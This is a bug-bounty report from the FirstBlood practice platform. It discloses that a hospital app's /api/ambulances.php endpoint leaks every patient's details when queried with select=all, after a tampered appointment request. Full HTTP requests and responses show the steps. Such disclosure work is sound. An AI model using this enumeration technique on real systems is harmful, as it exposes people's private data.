FirstBlood-#1192[Collab] Unauthorized Access to Patients' PII at /api/ambulances.php
This issue was discovered on FirstBlood v3



On 2022-12-08, buraaq Level 2 reported:

Collaborators:

Collab: isitbug Collab: eliee

Hello zseano,

Summary

API endpoint /api/ambulances.php?select= is used to query the details of patient and ambulance using appointmentId. All of the appointments' information is exposed if we query it using the all string rather than an ID.

Steps to Reproduce:

  1. Since enabling an ambulance service is not provided in appointment form, we manually add the parameter ambulance=1 in order to assign one for ourselves.

Request:

POST /api/ba.php HTTP/1.1
Host: d9b20d5057cc-buraaq.a.firstbloodhackers.com
Content-Length: 145
Content-Type: application/x-www-form-urlencoded
Anti-Csrf: 123
User-Agent: Mozilla/5.0
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

fname=buraaq&lname=sec&address=123&city=456&phonenumber=9876543211&[email protected]&dob=1-1-1900&a1=1&a2=2&a3=3&message=hello&ambulance=1&slot=2

Example Response:

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 08 Dec 2022 20:09:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44

success|36ddc575-0fda-4107-9661-e53b77172e87

  1. Now visit https://d9b20d5057cc-buraaq.a.firstbloodhackers.com/api/ambulances.php?select=all and should get all users' details.

Request:

GET /api/ambulances.php?select=all HTTP/1.1
Host: d9b20d5057cc-buraaq.a.firstbloodhackers.com
User-Agent: Mozilla/5.0
Connection: close

Example Response:

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 08 Dec 2022 20:13:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 1219

{
 "id": "99215d4e-0ff3-4275-aede-b3168428ec0a",
 "name": "John Smith",
 "location": "1 Quay Point, Station Road, Woodbridge, IP12 4AL",
 "ambulance": [
     {
       "appointment_assigned": "99215d4e-0ff3-4275-aede-b3168428ec0a",
       "ambId": "2022536203",
       "status": "attending"
     },
   ]
},

.....
.....
.....
.....

Impact

Attacker unauthorised access to any user's sensitive PII (name, location etc)

P2 High

Endpoint: /api/ambulances.php

Parameter: select

Payload: all


FirstBlood ID: 71
Vulnerability Type: Information leak/disclosure

The endpoint /api/ambulances.php leaks patient information if the parameter ?select=all is supplied

Report Feedback

@zseano

Creator & Administrator


Congratulations, you were the first to discover this bug and you have been rewarded a $200 bounty (split between 3). We've rounded it up to $67 per collaborator (as bounties are split evenly amongst collaborators)